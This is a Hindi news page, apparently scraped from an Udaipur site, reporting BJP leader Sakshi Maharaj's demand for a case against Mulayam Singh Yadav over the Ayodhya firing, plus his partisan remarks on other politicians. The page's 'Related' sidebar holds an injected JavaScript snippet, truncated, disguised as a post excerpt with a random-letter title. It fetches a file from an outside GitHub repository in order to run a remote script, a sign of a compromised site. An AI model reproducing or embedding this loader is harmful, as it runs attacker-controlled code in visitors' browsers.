मुलायम के खिलाफ दर्ज हो अयोध्या गोलीकांड का केस : साक्षी

Date:

mulayam singhudaipur एटा। भाजपा नेता एवं पूर्व सांसद स्वामी सच्चिदानंद हरि साक्षी ने कहा कि सपा प्रमुख मुलायम सिंह यादव ने अयोध्या में कार सेवकों पर गोली चलवाने की बात कुबूल कर चुके हैं, इसलिए उनके खिलाफ रिपोर्ट दर्ज होनी चाहिए। उन्होंने मांग की कि मामले में मुलायम की भूमिका की जांच किसी बड़ी एजेंसी से कराई जाए।
लोकसभा चुनाव की तैयारियों में जुटे साक्षी महाराज ने अपने उद्देतपुर गेस्ट हाउस में पत्रकारों से कहा कि अयोध्या में बाबरी मस्जिद कभी नहीं थी, वहां सिर्फ विवादित ढांचा था। मुलायम सिंह मुस्लिम तुष्टीकरण की राजनीति कर रहे हैं। वे न तो मुस्लिमों के हितैषी बन पाए और न ही हिंदुओं के। कारसेवकों पर गोली चलवाने की जिम्मेदारी लेकर उन्होंने अपनी भूमिका साफ कर दी है। केंद्र सरकार को उनके खिलाफ कार्रवाई करनी चाहिए। उन्होंने कहा कि अरविंद केजरीवाल की असलियत सब समझ चुके हैं। वे धरातल पर हैं और कुछ समय बाद रसातल में चले जाएंगे। साक्षी महाराज ने कहा कि नरेंद्र मोदी की लोकप्रियता जग जाहिर है, वे लोगों की पहली पसंद बन चुके हैं। कांग्रेस के राहुल गांधी को मोदी की क्लास में जाकर उनसे कुछ सीखना चाहिए।
तीसरे मोर्चे के सवाल पर उन्होंने कहा कि यह हर चुनाव से पहले बनाने का प्रयास किया जाता है, मगर कभी बनता नहीं है। उन्होंने अपने चुनाव लडऩे के सवाल पर कहा कि पार्टी जहां से टिकट देगी, वहीं से लोकसभा का चुनाव लड़ेंगे।

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Share post:

Subscribe

spot_imgspot_img

Popular

More like this
Related

oHmtKvYkl

QYRRUUjF;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script...

हिन्दुस्तान जिंक के स्वास्थ्य अभियान के तहत विश्व स्तनपान सप्ताह आयोजित

हिंदुस्तान जिंक, द्वारा स्वास्थ्य अभियान के तहत् विश्व स्तनपान...

हिंदुस्तान जिंक द्वारा खनन कार्यों में आंतरिक प्रतिभा के कौशल एवं अवसर वृद्धि हेतु जावर में ‘हिंदुस्तान जिंक माइनिंग अकादमी’ का शुभारंभ

इस अनूठी पहल से भूमिगत खदानों में जंबो हेल्पर्स प्रमाणित ऑपरेटर बन सकेंगे - पांच महीने तक चलनेवाले इस प्रशिक्षण कार्यक्रम में 16 सप्ताह का क्लासरूम इंस्ट्रक्शन शामिल होगा उदयपुर, 30 जुलाई, 2022: देश की एकमात्र और विश्व...